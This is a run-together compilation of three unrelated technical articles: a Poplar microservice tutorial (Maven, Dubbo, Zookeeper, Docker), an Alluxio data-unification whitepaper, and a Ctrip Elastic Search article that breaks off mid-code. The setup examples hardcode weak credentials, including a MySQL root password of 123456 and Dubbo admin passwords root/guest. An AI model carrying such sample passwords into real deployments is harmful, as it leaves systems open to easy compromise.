poplar-user-service: a microservice provider offering registration, login, user management and related services
poplar-feed-service: a microservice provider offering feed creation, feed-stream generation and related services
poplar-notice-service: a microservice provider offering notification services

Each sub-project is created separately as a Module. module

2. Maven Aggregate Project

Poplar consists of several service providers, consumers and common components whose dependencies include both peer relationships and parent-child relationships. To simplify configuration and allow unified builds, a sensible dependency layout is needed. The service providers are mainly Spring Boot projects with database-access and similar dependencies; the service consumers are also Spring Boot projects, but as the API layer they expose external interfaces and therefore need Controller support. Consumers and providers call each other through Dubbo, which requires a shared Dubbo component. So consumers and providers both depend on Spring Boot and Dubbo, and we can extract a parent pom defining the common parent component:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>pom</packaging>

<name>poplar</name>
<description>Poplar</description>
<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-data-redis</artifactId>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-jdbc</artifactId>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>    
    ...
</dependencies>

Besides importing the common build dependencies, the Poplar parent component must also declare the sub-modules it contains, so that when building from the top level, Maven's reactor can compute the dependency relationships and build order across modules. We add the service providers and consumers:

 <modules>
    <module>poplar-common</module>
    <module>poplar-api</module>
    <module>poplar-feed-service</module>
    <module>poplar-user-service</module>
</modules>

The sub-module pom then becomes much simpler: just specify the parent, with the pom source given as a relative path to the parent:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar-api</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>war</packaging>

<name>poplar-api</name>
<description>poplar api</description>

<parent>
    <groupId>com.lvwangbeta</groupId>
    <artifactId>poplar</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <relativePath>../pom.xml</relativePath> <!-- lookup parent from repository -->
</parent>   

There is one more shared package we have not covered: it contains the interfaces, models, utility methods and so on used by both consumers and providers. It depends neither on Spring nor on database access. Since it is a common component referenced by the other projects, we simply declare it as a local package with jar packaging; it does not need the parent:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar-common</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>jar</packaging>

When the project is packaged as a whole, Maven works out that the other sub-projects depend on this local jar and installs it into the local Maven repository first. Run mvn clean install in the Poplar root directory and look at the build order: the sub-projects are not built in the order we listed them in the Poplar pom. Instead, the Maven reactor computes the dependency order across modules, building the common dependency first, then poplar, and finally the consumers and providers.

[INFO] Reactor Summary:
[INFO]
[INFO] poplar-common ...................................... SUCCESS [ 3.341 s]
[INFO] poplar ............................................. SUCCESS [ 3.034 s]
[INFO] poplar-api ......................................... SUCCESS [ 25.028 s]
[INFO] poplar-feed-service ................................ SUCCESS [ 6.451 s]
[INFO] poplar-user-service ................................ SUCCESS [ 8.056 s]
[INFO] ------------------------------------------------------------------

If only a few sub-projects have changed, a full build is unnecessary: use Maven's -pl option to select the project and -am to also build the modules it depends on. Let's build just poplar-api, which depends on poplar-common and poplar:

mvn clean install -pl poplar-api -am  

Running the build shows that Maven builds poplar-api's dependencies, poplar-common and poplar, before building poplar-api itself:

[INFO] Reactor Summary:
[INFO] [INFO] poplar-common ...................................... SUCCESS [ 2.536 s]
[INFO] poplar ............................................. SUCCESS [ 1.756 s]
[INFO] poplar-api ......................................... SUCCESS [ 28.101 s]
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS

3. Dubbo & Zookeeper

The service providers and consumers described above rely on Dubbo for remote invocation, but a registry is still needed to handle provider registration and consumer notification. Zookeeper is one such registry implementation, and poplar uses Zookeeper as its registry.

3.1 Installing Zookeeper

Download and extract the Zookeeper release:

$ cd zookeeper-3.4.6  
$ mkdir data  

Create the configuration file:

$ vim conf/zoo.cfg

tickTime = 2000
dataDir = /path/to/zookeeper/data
clientPort = 2181
initLimit = 5
syncLimit = 2

Start:

$ bin/zkServer.sh start

Stop:

$ bin/zkServer.sh stop 

3.2 Dubbo admin

Install the Dubbo admin console:

git clone https://github.com/apache/incubator-dubbo-ops
cd incubator-dubbo-ops && mvn package  

You will then find the packaged war in the target directory. Extract it into Tomcat's webapps/ROOT directory (empty the ROOT directory first). Have a look at the extracted dubbo.properties file, which specifies the IP and port of the Zookeeper registry:

dubbo.registry.address=zookeeper://127.0.0.1:2181
dubbo.admin.root.password=root
dubbo.admin.guest.password=guest

Start Tomcat:

./bin/startup.sh 	

Visit:

http://127.0.0.1:8080/   

With that, Dubbo's monitoring of the registry is set up.

dubbo-admin

4. Development

Developing microservice providers and consumers differs somewhat from the traditional monolithic model, but the logic is broadly similar. The main difference is the registry: consumers and providers must cooperate to complete a request, which requires agreeing on interfaces and models between the two sides to keep calls working.

Using user registration as an example, this section walks through the complete development flow from a channel call to the service provider, the consumer and the publication of the common module.

4.1 Common Module

As the common module, poplar-common defines the interfaces and models that both consumers and providers depend on; only then can the microservices be accessed properly once published.
Define the user service interface:

public interface UserService {
    String register(String username, String email, String password);
}

4.2 Service Provider

UserServiceImpl implements the UserService interface defined in poplar-common:

@Service
public class UserServiceImpl implements UserService {

    @Autowired
    @Qualifier("userDao")
    private UserDAO userDao;

    public String register(String username, String email, String password){
        if(email == null || email.length() <= 0)
            return Property.ERROR_EMAIL_EMPTY;

        if(!ValidateEmail(email))
            return Property.ERROR_EMAIL_FORMAT;
        ...
    }

As you can see, this is a plain Spring Boot service, except that the @Service annotation must come from the Dubbo package so that Dubbo can scan the service and register it with Zookeeper:

dubbo.scan.basePackages = com.lvwangbeta.poplar.user.service

dubbo.application.id=poplar-user-service
dubbo.application.name=poplar-user-service

dubbo.registry.address=zookeeper://127.0.0.1:2181

dubbo.protocol.id=dubbo
dubbo.protocol.name=dubbo
dubbo.protocol.port=9001

4.3 Service Consumer

As mentioned earlier, poplar-api is both the API gateway and a service consumer: it orchestrates the providers' call relationships to complete the request chain.

The API layer uses the @Reference annotation to request a service from the registry, communicating with the service provider over RPC through the UserService interface defined in the poplar-common module:

@RestController
@RequestMapping("/user")
public class UserController {

    @Reference
    private UserService userService;

    @ResponseBody
    @RequestMapping("/register")
    public Message register(String username, String email, String password) {
        Message message = new Message();
        String errno = userService.register(username, email, password);
        message.setErrno(errno);
        return message;
    }
} 

application.properties configuration:

dubbo.scan.basePackages = com.lvwangbeta.poplar.api.controller

dubbo.application.id=poplar-api
dubbo.application.name=poplar-api

dubbo.registry.address=zookeeper://127.0.0.1:2181 

5. Dockerizing the Services

If all of the steps above are done, a complete microservice architecture is essentially in place and you can start coding business logic. So why bother with Dockerization? First, as business complexity grows, new microservice modules may be introduced, and it is useful to provide a stable surrounding environment while developing a new module; if the test environment is unreliable, you can start the necessary Docker containers yourself and save build time. Second, it reduces the stability problems that come with environment migration, makes testing and deployment easier, and gives continuous integration a more convenient and efficient way to deploy.

Running build.sh in the poplar root directory Dockerizes and starts all of poplar's microservice modules in one step:

cd poplar && ./build.sh

If you are curious how this works, read the next two short sections.

5.1 Building Images

Poplar Dockerizes each microservice, the databases and the registry separately. poplar-dubbo-admin is the Dubbo admin console; poplar-api, poplar-tag-service, poplar-action-service, poplar-feed-service and poplar-user-service are the service-layer business modules; poplar-redis and poplar-mysql provide cache and persistence; poplar-zookeeper is the Zookeeper registry:

poplar-dubbo-admin
poplar-api
poplar-tag-service
poplar-action-service
poplar-feed-service
poplar-user-service
poplar-redis
poplar-mysql
poplar-zookeeper

The business modules poplar-api, poplar-tag-service, poplar-action-service, poplar-feed-service and poplar-user-service can be built with the docker-maven-plugin configured in pom.xml; specifying the working directory, base image and other details in the configuration block removes the need for a Dockerfile:

<plugin>
    <groupId>com.spotify</groupId>
    <artifactId>docker-maven-plugin</artifactId>
    <version>1.0.0</version>
    <configuration>
        <imageName>lvwangbeta/poplar</imageName>
        <baseImage>java</baseImage>
        <maintainer>lvwangbeta lvwangbeta@163.com</maintainer>
        <workdir>/poplardir</workdir>
        <cmd>["java", "-version"]</cmd>
        <entryPoint>["java", "-jar", "${project.build.finalName}.jar"]</entryPoint>
        <skipDockerBuild>false</skipDockerBuild>
        <resources>
            <resource>
                <targetPath>/poplardir</targetPath>
                <directory>${project.build.directory}</directory>
                <include>${project.build.finalName}.jar</include>
            </resource>
        </resources>
    </configuration>
</plugin>

To exclude a sub-project from the Docker build, set skipDockerBuild to true in its pom.xml. For example, poplar-common is a shared dependency and does not need its own image:

<skipDockerBuild>true</skipDockerBuild>

Run the following command in the poplar root directory to build the whole business layer:

mvn package -Pdocker  -Dmaven.test.skip=true docker:build
[INFO] Building image lvwangbeta/poplar-user-service
Step 1/6 : FROM java
 ---> d23bdf5b1b1b
Step 2/6 : MAINTAINER lvwangbeta lvwangbeta@163.com
 ---> Running in b7af524b49fb
 ---> 58796b8e728d
Removing intermediate container b7af524b49fb
Step 3/6 : WORKDIR /poplardir
 ---> e7b04b310ab4
Removing intermediate container 2206d7c78f6b
Step 4/6 : ADD /poplardir/poplar-user-service-2.0.0.jar /poplardir/
 ---> 254f7eca9e94
Step 5/6 : ENTRYPOINT java -jar poplar-user-service-2.0.0.jar
 ---> Running in f933f1f8f3b6
 ---> ce512833c792
Removing intermediate container f933f1f8f3b6
Step 6/6 : CMD java -version
 ---> Running in 31f52e7e31dd
 ---> f6587d37eb4d
Removing intermediate container 31f52e7e31dd
ProgressMessage{id=null, status=null, stream=null, error=null, progress=null, progressDetail=null}
Successfully built f6587d37eb4d
Successfully tagged lvwangbeta/poplar-user-service:latest
[INFO] Built lvwangbeta/poplar-user-service
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------

5.2 Running the Containers

Since poplar involves quite a few containers, we create a custom network, poplar-network, for them:

docker network create --subnet=172.18.0.0/16 poplar-network

Then we run containers from the images built above, assigning each an IP in the same subnet.

Start the Zookeeper registry:

docker run --name poplar-zookeeper --restart always -d  --net poplar-network --ip 172.18.0.6  zookeeper 

Start MySQL:

docker run --net poplar-network --ip 172.18.0.8  --name poplar-mysql -p 3307:3306 -e MYSQL_ROOT_PASSWORD=123456 -d  lvwangbeta/poplar-mysql

Start Redis:

docker run --net poplar-network --ip 172.18.0.9 --name poplar-redis -p 6380:6379 -d redis

Start the business services:

docker run --net poplar-network --ip 172.18.0.2 --name=poplar-user-service -p 8082:8082 -t lvwangbeta/poplar-user-service

docker run --net poplar-network --ip 172.18.0.3 --name=poplar-feed-service -p 8083:8083 -t lvwangbeta/poplar-feed-service

docker run --net poplar-network --ip 172.18.0.4 --name=poplar-action-service -p 8084:8084 -t lvwangbeta/poplar-action-service

docker run --net poplar-network --ip 172.18.0.10 --name=poplar-api -p 8080:8080 -t lvwangbeta/poplar-api

docker ps

At this point the poplar backend is fully built, started and serving requests; clients (whether Web or App) see only a single unified API.


Unifying Structured Big Data with Alluxio

Understand the benefits Alluxio brings when analyzing structured big data stored in data warehouses.

  • Consolidate data storage through configuration rather than ETL

  • Unify big data files across file systems and object stores

  • Provide fast, on-demand local access to important and frequently used data without keeping permanent copies

  • Reduce storage costs by removing data copies and moving data to commodity storage

1. Abstract

Problem statement: analyzing structured big data stored in different warehouses is a challenge for large enterprises

  • Many large enterprises have structured big data stored in different warehouses using a variety of storage technologies such as HDFS, object stores and NFS.

  • Business users need to access data across these warehouses to run high-performance queries and gain meaningful insight.

The traditional approach: data lakes

  • The data lake is the traditional answer to this problem, providing a single system through which the relevant data can be accessed.

  • Data lakes built the traditional way are resource-intensive, require costly permanent data copies, and introduce a delay between data creation and analysis.

  • Over time, lines of business tend to create their own separate data lakes, producing warehouses built on incompatible storage technologies.

  • Large enterprises may also deploy a "data lake of data lakes" to access data across lines of business, creating yet another data copy.

  • Teams keep experimenting with new storage and compute technologies, making data management ever harder.

The new approach: the Alluxio virtual distributed file system

  • Alluxio is the first storage virtualization technology to unify big data files across file systems and object stores.

  • Acting as a "virtual data lake", it lets applications access files in Alluxio's global namespace as if they lived in a traditional Hadoop file system or object store.

  • Alluxio provides fast, on-demand local access to important and frequently used data without maintaining a permanent copy. Only data blocks are cached, not whole files.

  • Enterprises can reduce storage costs by moving more data to commodity storage.

  • Underlying stores are consolidated through configuration rather than ETL. Data stays in its source system, effectively eliminating stale-data problems.

  • Developers interact with Alluxio through industry-standard interfaces, including HDFS and S3A. Alluxio's pluggable architecture can support future interface technologies.

  • Scalability, flexibility, security and fault tolerance are designed into the system natively.

SQL code example: includes a technical example of using Spark SQL to execute and persist a SQL join across tables that span multiple storage clusters.

2. Introduction

As data volumes grow, large enterprises are adopting big data technologies to handle petabyte-scale structured and unstructured data. Big data is typically stored across many systems and business units, and enterprises ask their technology teams to provide a unified, aggregated view of the data across these systems in a performant and cost-effective way.

This article introduces Alluxio and how it uniquely solves the problem of unified management of and access to structured big data.

3. Traditional Approaches to Unifying Big Data

When a large enterprise cannot keep its big data in a single source system or data lake, it faces the problem of unified access. This is usually addressed with a custom application-layer solution or by building a data lake. In practice, both tend to be difficult:

Custom solutions

  • Require writing and maintaining custom application-layer code, which is labor-intensive and brittle.

  • Lack caching, a major obstacle to query performance.

Traditional data lakes

  • Traditional data lakes are resource-intensive and require maintaining permanent data copies, which is very expensive.

  • Every copy introduces delay, and the version of the data used for analysis is not necessarily the latest.

  • Over time, lines of business tend to create their own separate data lakes, producing warehouses built on incompatible storage technologies.

image

4. Unifying Big Data - the Alluxio Way

Alluxio is the world's first memory-speed virtual distributed file system. It unifies data access and bridges compute frameworks and underlying storage systems. Applications only need to connect to Alluxio to access data stored in any underlying storage system. Moreover, the Alluxio architecture can serve data at memory speed, providing the fastest possible I/O.

In the big data ecosystem, Alluxio sits between compute and storage. It can bring significant performance gains to the ecosystem, especially across data centers and availability zones. Alluxio is Hadoop- and object-store-compatible and supports reads and writes to the underlying stores. Existing analytics applications such as Hive, HBase and Spark SQL can run on Alluxio without any code changes.

Benefits of Alluxio

  • Unified access: acts as a "virtual data lake". Files can be accessed in Alluxio's global namespace as if they were stored in a single system.

  • Performance: fast local access to important, frequently used data without maintaining permanent copies of everything. Alluxio intelligently caches only the data blocks that are needed, not whole files.

  • Flexibility: data in Alluxio can be shared across workloads, not only queries but also batch analytics, machine learning and deep learning.

  • Optimized storage cost: reads and writes go transparently to the source systems, so no permanent data copies are created. Alluxio's built-in cache can:

  • Use spare RAM and disk on the compute nodes to reduce hardware cost.

  • Let enterprises move more data to lower-cost commodity storage.

  • Configuration-driven: underlying stores are consolidated through configuration rather than ETL.

  • A more modern, flexible architecture: promotes the separation of compute and storage. The plug-and-play architecture can support future technologies.

  • No vendor lock-in: supports industry-standard interfaces, including HDFS and S3A.

  • Preserves enterprise data security and governance: integrates with existing enterprise systems for unified data management.

image

Innovations Alluxio provides

Global namespace: users interact with the underlying stores as mount points in a single virtual file system, simplifying access.

Server-side API translation: users talk to Alluxio over HDFS or S3A, but the underlying storage systems do not need to support HDFS or S3A natively. Any storage system with a compatible interface can be mounted as an under store, and Alluxio makes it easy to translate between the server-side API and the interface the application chooses. New custom interfaces can also be added through Alluxio's modular architecture. This translation capability improves the interoperability of your enterprise architecture and simplifies development.

Compatible under-store interfaces: HDFS, NFS, Amazon S3A, Azure Blob Storage or Google Cloud Storage.

In-band caching: caching is in-band, i.e. transparent to the user, and controlled through centrally managed policies. Users benefit from improved performance without any effort, and management stays organized.

Sample use case:

In this example enterprise, all data related to customer interactions lives in two different systems: the sales system holds information on every product a customer has purchased, and the customer-support system holds every support case a customer has logged. The two systems are siloed, but to understand all of a customer's interactions, queries must join across both silos and present the results to users as a customer view.

Unified SQL queries: an example

Once the underlying storage systems are unified through Alluxio, a SQL engine can interact with the underlying tables as if they were part of a single system.

In the example below, Spark SQL loads two tables from different clusters, located at Alluxio paths "/mnt/a" and "/mnt/b", and writes the result to a third cluster at "/mnt/c".

image

5. Performance and Storage Cost

In most cases only a fraction of a corpus, typically less than 20%, is used in any one analysis. Traditionally, enterprises had to trade off fast access to important, frequently used data against unified access to all data, at significant cost to the technology budget.

Alluxio enables efficient unified access to enterprise data while also providing fast, on-demand local access to the data used for analysis. As a virtual file system, Alluxio's global namespace lets users browse and interact with file metadata from the mounted systems, but data is only accessed when a user needs it, and requested file data can be cached transparently. This just-in-time design lets Alluxio address performance and cost at the same time.

Design challenges and caching

When designing a high-performance big data architecture, the practical realities of modern infrastructure must be addressed.

When performance is needed, Alluxio uses its local intelligent cache to solve the problems of data locality and low-cost storage.

The cache is managed as follows:

Administrators decide how much cache space Alluxio gets for the best cost-performance ratio, while intelligent policies transparently manage which data stays in the cache. When the cache space is full, data access continues normally while the intelligent cache prioritizes data.

With Alluxio's fully integrated cache, application users get transparent, high-speed access to data from remote or slow storage systems, while the enterprise keeps control of storage costs.

Tiered caching

Alluxio can be colocated in the data center or availability zone where compute and job execution happen, and can be installed on existing compute nodes, dedicated nodes, or a mix of both. Alluxio's cache can be set up over RAM, SSD and HDD, with space reserved for each through configuration.

Users define policies for pinning, multi-tier promotion/demotion and TTL. For example, a common tiering approach is:

imageimage

By default, data is cached into the top tier and evicted to the next tier as needed. Administrators control these global policies and can also set custom caching policies per under store, for finer control over Alluxio's storage resources. If authorized, users can also specify cache overrides per request.
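A tiered cache like the one described above is configured in Alluxio's worker settings; as an illustrative sketch (the paths and quotas here are examples, not recommendations):

```properties
# Two cache tiers: RAM on top, SSD below (paths and quotas are examples)
alluxio.worker.tieredstore.levels=2
alluxio.worker.tieredstore.level0.alias=MEM
alluxio.worker.tieredstore.level0.dirs.path=/mnt/ramdisk
alluxio.worker.tieredstore.level0.dirs.quota=16GB
alluxio.worker.tieredstore.level1.alias=SSD
alluxio.worker.tieredstore.level1.dirs.path=/mnt/ssd
alluxio.worker.tieredstore.level1.dirs.quota=200GB
```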

Storage cost optimization

For performance and interoperability reasons, CIOs today often have to choose expensive storage technologies over lower-cost alternatives.

With Alluxio, CIOs can accelerate enterprise archiving strategies and move more data to low-cost storage technologies:

  • Alluxio's intelligent cache provides data locality to overcome the typically poor performance of low-cost storage.

  • Once mounted in Alluxio, applications that access data through HDFS or S3A interfaces can reach storage technologies that do not support those interfaces natively.

  • Data can be moved between storage systems without any changes at the application layer.

6. Enterprise Considerations

Petabyte-scale data

Most large enterprises have petabyte-scale structured big data, and the logical big data tables commonly seen are terabyte-scale. To improve operations, these large tables are typically split into table-partition files, and big data storage systems (e.g. HDFS and object stores) split large files into megabyte-scale blocks. Block-level storage allows fine-grained control over big data files and minimizes data flow across the network. Alluxio is designed to work seamlessly with HDFS and object stores and transparently returns only the blocks needed to satisfy a request. This guarantees that data unification does not come at the cost of I/O bottlenecks or massive data movement.

Metadata management

Alluxio shares a basic design assumption common to leading big data systems such as HDFS and object stores: data is immutable, i.e. once written it is never modified. Immutable data lets these systems break the scale limits imposed by random-write requirements. Alluxio builds on immutability to make metadata synchronization with the under store a low-overhead operation. When new files are written through Alluxio, they are available immediately. Files added to the under store outside of Alluxio are synchronized according to a user-defined metadata refresh policy. In both cases Alluxio's metadata stays in sync, simplifying data access for users.

Security

Data security is extremely important to large enterprises. Beyond unified data management and access, Alluxio can also serve as a unified security layer across multiple storage systems.

User authentication

In an enterprise with a unified identity service, Alluxio simply treats that service as the source of truth and does not take responsibility for unifying identities across services. An identity service such as LDAP connects to the different stores through their various authentication and IAM protocols.

If an organization has no unified identity service, Alluxio offers a flexible credential-management approach for secure connections to multiple under stores. User authentication in Alluxio is done via Kerberos and is decoupled from under-store authentication, which uses whatever authentication method each under store supports.

Access control

Alluxio provides a unified access-control model similar to the familiar POSIX-compliant model. In addition, it adds UNIX-like access control lists (ACLs) for fine-grained permission control for any user or group.

If users are managed in an LDAP identity store, Alluxio can also integrate with Active Directory and LDAP to look up group membership and enforce access control.

When accessing data in a remote secured Hadoop cluster, Alluxio supports HDFS user impersonation, a security best practice. With impersonation, Alluxio requests data access on behalf of the client, so the Hadoop cluster retains full user authorization and Alluxio acts as a transparent data proxy. Administrators keep managing security with existing Hadoop tools such as Cloudera Sentry and Apache Ranger.

Encryption

Alluxio supports mounting encrypted data sources. Because Alluxio itself attaches no semantic structure to the contents of data blocks, encrypted data does not affect Alluxio's core operation.

For example, if a SQL engine needs access to encrypted HDFS data, Alluxio impersonates the client's user and requests access on their behalf. Once authorized, the data is decrypted and returned to the user in its normal form. If caching is also enabled, the data is stored unencrypted in Alluxio. Kerberos can also be enabled to further secure access.

If the data is not already encrypted in the under store, or if the cache in Alluxio needs to be encrypted, Alluxio can also encrypt/decrypt on behalf of the client application. Data encrypted by Alluxio can be written back to the under store even when encryption is not globally configured by the storage system itself.

Elasticity & centralization

Many large enterprises want elasticity and centralization to optimize resource usage. To enable this shift, application stacks are being redesigned to separate compute and storage, and Alluxio's design promotes exactly this separation of concerns.

The system itself is designed to scale up and down as resource demands change, and can be used alongside enterprise resource managers such as DC/OS and Kubernetes. In these environments, Alluxio can be used to unify data residing outside those clusters.

Fault tolerance

Alluxio is a distributed, scalable system with built-in fault tolerance. No component is a single point of failure, and no data is lost if a component crashes. A multi-master deployment of Alluxio is recommended.

The under store can also be replicated through Alluxio's under-store replication feature, supporting high-availability requirements beyond a single Alluxio cluster.

7. Conclusion

As large enterprises wrestle with ever-growing data volumes, a widening array of storage technologies and a proliferation of applications, unifying big data is becoming unmanageable with traditional approaches.

Alluxio is the first storage virtualization technology to unify big data without keeping its own permanent copies, acting as a "virtual data lake". Applications access files in Alluxio through industry-standard interfaces and a global namespace, as if the files lived in a traditional data lake. What makes Alluxio unique is that the underlying stores are integrated through configuration rather than ETL, and data stays in its source system, effectively eliminating stale data.

Alluxio lets enterprises optimize storage costs by moving more data to low-cost storage while providing fast local access to important, frequently used data. All of this is delivered in a scalable, secure and fault-tolerant distributed system.


In Practice | Elastic Search for Ctrip Hotel Orders

About the author

Liu Cheng is a technical expert in Ctrip's hotel R&D department. He joined Ctrip in 2014, has led development on several order-processing projects, and specializes in solving production performance problems.

Business Scenario

image


As order volume grows by the day, a single database's read/write capacity starts to fall short. At that point, sharding the database becomes the natural move. Writes after sharding are easy: just take the shard key modulo the shard count. But how should multi-dimensional queries be handled?

Querying shard by shard and aggregating in memory is one option, but its drawbacks are obvious: for shards that return no data, the query is wasted work for the application servers and an unnecessary burden on precious database resources.

As for query performance, it can be improved by querying shards concurrently on multiple threads, but multithreaded programming and aggregating the database results add complexity and room for error. Just imagine implementing paginated queries across shards and you will see the problem.

So we chose to build a real-time index over the sharded databases and funnel queries through a single independent web service, improving query convenience for business applications while preserving performance. The question then becomes: how do you build an efficient index over shards?


Choosing an Indexing Technology

image


The real-time index contains the columns used in common queries, such as user ID, user phone number and user address, replicated and distributed in real time to a separate storage medium. At query time, the index is consulted first; if it already contains the needed columns, the data is returned directly. If additional data is needed, a second query is made along the shard dimension. Since the exact shard is already known by then, that query is efficient too.
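The flow described above can be sketched as follows; the data is made up, and in-memory maps stand in for the real index service and the sharded databases:

```javascript
// Sketch of "query the index first, then hit only the right shard".
// The index stores frequently queried columns plus the shard key;
// the shards are plain maps standing in for the sharded databases.

const NUM_SHARDS = 4;
const shardOf = (userId) => userId % NUM_SHARDS; // modulo shard key, as in the article

// The real-time index: phone -> { userId, orderId, ...hot columns }
const index = new Map([
  ['13800000001', { userId: 42, orderId: 'A1001', status: 'PAID' }],
]);

// Sharded stores keyed by orderId, holding the full order rows.
const shards = Array.from({ length: NUM_SHARDS }, () => new Map());
shards[shardOf(42)].set('A1001', { orderId: 'A1001', userId: 42, amount: 199 });

function queryByPhone(phone, needFullRow) {
  const hit = index.get(phone);
  if (!hit) return null;
  if (!needFullRow) return hit; // the index already holds the hot columns
  // The shard is known from the index, so the second query touches one shard only.
  return shards[shardOf(hit.userId)].get(hit.orderId);
}

console.log(queryByPhone('13800000001', false).status); // 'PAID'
console.log(queryByPhone('13800000001', true).amount);  // 199
```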


Why Not Database Indexes

image


A database index is a copy of selected columns of a table.

Because it contains low-level disk block addresses or direct links to the original rows, lookups are very efficient. The upside is that the database's built-in index mechanism is stable, reliable and fast. The downside is that as query scenarios multiply, so does the number of indexes.

As the business has evolved, the order entity has grown to over a thousand attributes, with dozens of frequently queried dimensions that combine into hundreds of variants. Indexes are not free: every insert, update or delete incurs extra writes, and each index consumes extra physical storage. The more indexes, the higher the database's index maintenance cost. So what are the alternatives?


Choosing an Open Source Search Engine

image


What immediately came to mind were the open source search engines Apache Solr and Elastic Search.

Solr is an open source search platform built on the Java library Lucene, exposing Lucene's search capabilities in a friendlier way. It has been around for a decade and is a very mature product, offering distributed indexing, replication, load-balanced querying, and automatic failover and recovery.

Elastic Search is also a distributed RESTful search engine built on Lucene. It provides distributed full-text search through a RESTful interface and schema-free JSON documents. Each index can be split into multiple shards, and each shard can have multiple replicas.

Each has its strengths. On installation and configuration, Elastic Search, being the newer product, is more lightweight and easier to install and use. On search, full-text capabilities aside, Elastic Search performs better on analytical queries. On distribution, Elastic Search supports multiple shards per server and automatically rebalances shards across all machines as servers are added. On community and documentation, Solr's seniority gives it the larger body of material.

According to Google Trends, Elastic Search draws considerably more attention than Solr.

image

In the end we chose Elastic Search for its light weight, ease of use and better support for distribution; the whole install package is only a few tens of megabytes.


Implementing Replication

image

To avoid reinventing the wheel, we looked for existing components. The database is SQL Server, and we found no suitable open source component for it. SQL Server can track inserts, updates and deletes in real time, writing changed rows to a separate table, but it cannot push the data into Elastic Search automatically, and it provides no API for notifying a designated application. So we set out to implement replication at the application level.


Why Not Replicate in the Data Access Layer

image

The data access layer was the first candidate to catch our eye: every time the application writes to the database, write a record to Elastic Search in real time. But after considering the following, we chose a different path:

  • Writing to Elastic Search on every insert/update/delete couples business logic tightly to replication. Any instability in Elastic Search or related factors directly destabilizes business processing. Write to Elastic Search asynchronously on a separate thread? Then how do you handle application deploys and restarts? Add piles of exception handling and retry logic? Then ship it as a JAR referenced by dozens of applications, where one small bug destabilizes them all?


Scanning the Database in Real Time

image


At first glance this looks terribly inefficient, but given our actual circumstances it turns out to be a simple, stable and efficient approach:

  • Zero coupling. No application needs to change at all, and business processing efficiency and stability are unaffected.

  • Batched writes to Elastic Search. Since scans return data in batches, it can be written to Elastic Search in bulk, sparing Elastic Search the frequent cache refreshes caused by many individual requests.

  • Heavy, millisecond-level concurrent writes. Scans that return no data are extra load on the database, but our write volume and concurrency are both very high, so this overhead is acceptable.

  • No deletes. A scan cannot detect deleted rows, but all order-related records must be retained, so deletion never occurs.


Improving Elastic Search Write Throughput

image


Because this is real-time replication from the database, the demands on efficiency and concurrency are high. Here are some of the optimizations we applied to Elastic Search writes:

  • Use bulk requests to merge many operations into one request. Elastic Search handles batches well; for example, translog persistence defaults to per-request, so batching greatly reduces disk writes and improves write performance. The right batch size depends on server configuration, index structure and data volume; it can be made dynamically configurable and tuned in production.

  • For indexes that do not need strong real-time behavior, set index.refresh_interval to 30 seconds (the default is 1 second). Elastic Search then creates a new segment only every 30 seconds, easing later flush and merge pressure.

  • Set the index schema up front and strip unneeded features. For example, by default a string field is mapped to both a keyword and a text index: the former suits exact matches on short values such as mailing addresses, server names and tags; the latter suits searching within longer content such as email bodies and product descriptions. Pick one based on the actual query scenario.

image

For fields whose relevance score you do not care about, set norms: false.

image

For fields that will never be used in phrase queries, set index_options: freqs.

image

 

  • For indexes that can tolerate data loss, or where a disaster-recovery cluster exists, set index.translog.durability to async (the default is request). Persisting Lucene writes to disk is relatively expensive, so the translog is persisted first and writes to Lucene are batched. Writing the translog asynchronously means not every request has to hit the disk, which improves write performance. The effect is most visible during initial data loads; for later real-time writes, bulk requests cover most scenarios.
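To make these write-side points concrete, the sketch below builds the JSON bodies a client would send to Elastic Search; the index name "orders" and the field names are made up, and the settings simply mirror the bullet points above:

```javascript
// Build request bodies for the write optimizations described above.
// The "orders" index and its fields are hypothetical examples.

const indexSettings = {
  settings: {
    'index.refresh_interval': '30s',       // fewer segments/flushes
    'index.translog.durability': 'async',  // only if data loss is acceptable
  },
  mappings: {
    properties: {
      address: { type: 'keyword' },                        // exact match, no analysis
      remark:  { type: 'text', index_options: 'freqs' },   // no phrase queries needed
    },
  },
};

// A _bulk body: alternating action and source lines, newline-delimited,
// ending with a final newline.
function buildBulkBody(docs) {
  return docs
    .map((d) => JSON.stringify({ index: { _index: 'orders', _id: d.id } }) +
                '\n' + JSON.stringify(d.source))
    .join('\n') + '\n';
}

const body = buildBulkBody([
  { id: '1', source: { address: 'Shanghai', remark: 'vip' } },
  { id: '2', source: { address: 'Beijing', remark: 'new' } },
]);
console.log(body.trim().split('\n').length); // 4 lines: 2 actions + 2 sources
```

A client would PUT the settings when creating the index and POST the NDJSON body to the `_bulk` endpoint; the exact mapping syntax varies between Elastic Search versions, so treat this as a shape sketch rather than a copy-paste config.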


Improving Elastic Search Read Performance

image

To improve query performance we made the following optimizations:

  • At write time, set _routing to the most frequently queried field. Elastic Search's default partitioning hashes the document id modulo the shard count to pick a shard, so setting the most-queried field as the _routing value guarantees that queries on that field need to touch only one shard to return results.

Write:

image

Query:

image

  • For date fields, lower the precision as far as the business allows: if year-month-day is enough, do not include hours, minutes and seconds. With large data volumes this optimization is especially noticeable, because lower precision means higher cache hit rates and therefore faster queries, while better memory reuse improves Elastic Search server performance, lowers CPU usage and reduces GC frequency.
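The two read-side points can be sketched as follows; the toy hash merely mimics Elastic Search's default routing formula (the real implementation uses murmur3), and the phone/date values are made up:

```javascript
// 1) Routing: documents and queries with the same _routing value always
//    land on the same shard, so a routed query touches one shard only.
//    A toy hash is enough to show the idea (ES actually uses murmur3).
function toyHash(s) {
  let h = 0;
  for (const c of s) h = (h * 31 + c.charCodeAt(0)) >>> 0;
  return h;
}
const shardFor = (routing, numShards) => toyHash(routing) % numShards;

const a = shardFor('user-42', 5);
const b = shardFor('user-42', 5);
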